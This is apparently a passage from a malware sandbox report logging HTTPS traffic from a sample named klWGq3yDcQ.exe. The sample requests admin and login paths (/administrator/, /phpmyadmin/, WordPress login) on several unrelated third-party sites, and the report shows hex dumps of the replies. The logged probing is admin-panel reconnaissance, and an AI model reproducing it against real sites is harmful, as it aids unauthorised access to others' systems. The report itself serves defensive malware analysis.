                                                                                                                                                                                                    2023-11-26 05:59:34 UTC776INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC593INData Raw: 31 38 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65
                                                                                                                                                                                                    Data Ascii: 18e9<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; High Tide Inc. &#8212; WordPress</title><meta name="robots" content="max-image-preview:large, noindex, noarchive
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 31 30 6e 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69
                                                                                                                                                                                                    Data Ascii: f="https://hightideinc.com/wp-admin/css/forms.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id="l10n-css" href="https://hightideinc.com/wp-admin/css/l10n.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" i
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 20 2f 3e 0a 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22
                                                                                                                                                                                                    Data Ascii: l Address</label><input type="text" name="log" id="user_login" class="input" value size="20" autocapitalize="off" autocomplete="username" required="required" /></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd"
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 75 73 28 29 3b 20 64 2e 73 65 6c 65 63 74 28 29 3b 7d 20 63 61 74 63 68 28 20 65 72 20 29 20 7b 7d 7d 2c 20 32 30 30 29 3b 7d 0a 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 0a 69 66 20 28 20 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 29 20 7b 20 77 70 4f 6e 6c 6f 61 64 28 29 20 7d 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 3c 2f 61 3e 20 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 2d
                                                                                                                                                                                                    Data Ascii: us(); d.select();} catch( er ) {}}, 200);}wp_attempt_focus();if ( typeof wpOnload === 'function' ) { wpOnload() }/* ... */</script><p id="backtoblog"><a href="https://hightideinc.com/">&larr; Go to High Tide Inc.</a> </p><div class="privacy-policy-
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72
                                                                                                                                                                                                    Data Ascii: /hightideinc.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://hightideinc.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><scr
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC316INData Raw: 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 30 30 37 63 61 39 30 65 65 30 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73
                                                                                                                                                                                                    Data Ascii: /script><script type="text/javascript" id="user-profile-js-extra">/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"007ca90ee0"};/* ... */</script><script type="text/javascript" src="https://hightideinc.com/wp-admin/js/user-profile.min.js
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    145192.168.2.45826834.240.130.5443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC247OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.harasduberry.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC7295INData Raw: 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 31 63 35 32 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47 6d 62 48 2c 20 53
                                                                                                                                                                                                    Data Ascii: ntr\u00f4le Jimdo\n\nLes cooki1c52es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo GmbH, S


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    146192.168.2.458227116.202.203.1764436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC565INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 34 39 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 37 20 41 75 67 20 32 30 30 35 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 13491Connection: closeX-Frame-Options: SAMEORIGINExpires: Wed, 17 Aug 2005 00:00:00 GMTCache-Control: no-store, no-cache,
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC13491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 41 4b 20 48 4c 57 20 4c 61 6e 64 65 63 6b 2c 20 57 65 62 73 69 74 65 20 64 65 72 20 48 61 6e 64 65 6c 73 61 6b 61 64 65 6d 69 65 2c 20 64 65 72 20 4d 65 64 69 61 68 61 6b 20 4c 61 6e 64 65 63 6b 20 75 6e 64
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de-de" dir="ltr"><head> <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="HAK HLW Landeck, Website der Handelsakademie, der Mediahak Landeck und


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    147192.168.2.458084213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC461INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.ceuandalucia.es/wp-json/>; rel
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC6INData Raw: 32 33 30 34 0d 0a
                                                                                                                                                                                                    Data Ascii: 2304
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC4773INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 68 74 6d 6c 2d 6c 6f 61 64 69 6e 67 20 77 66 2d 61 63 74 69 76 65 20 69 65 20 6f 6c 64 2d 62 72 6f 77 73 65 72 20 6c 74 2d 69 65 31 30 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 72 65 73 70 6f 6e 73 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js html-loading wf-active ie old-browser lt-ie10 lt-ie9 lt-ie8 lt-ie7 responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage" lang="es" xmlns:og="http://opengraphprotocol.org/schema/"
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC4191INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: <style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em !important;back
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC6INData Raw: 32 37 66 63 0d 0a
                                                                                                                                                                                                    Data Ascii: 27fc
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5939INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 65 77 73 6c 65 74 74 65 72 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6e 65 77 73 6c 65 74 74 65 72 2f 73 75 62 73 63 72 69 70 74 69 6f 6e 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 35 2e 31 2e 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6d 6f 6f 76 65 5f 67 64 70 72 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='newsletter-subscription-css' href='https://www.ceuandalucia.es/wp/wp-content/plugins/newsletter/subscription/style.css?ver=5.1.8' type='text/css' media='all' /><link rel='stylesheet' id='moove_gdpr_frontend-css' href='https:/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC4297INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 76 69 73 69 6f 6e 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d 32 2e 30 2e 39 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 63 68 69 6c 64 2d 66 72 6f 6e 74 65 6e 64 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77
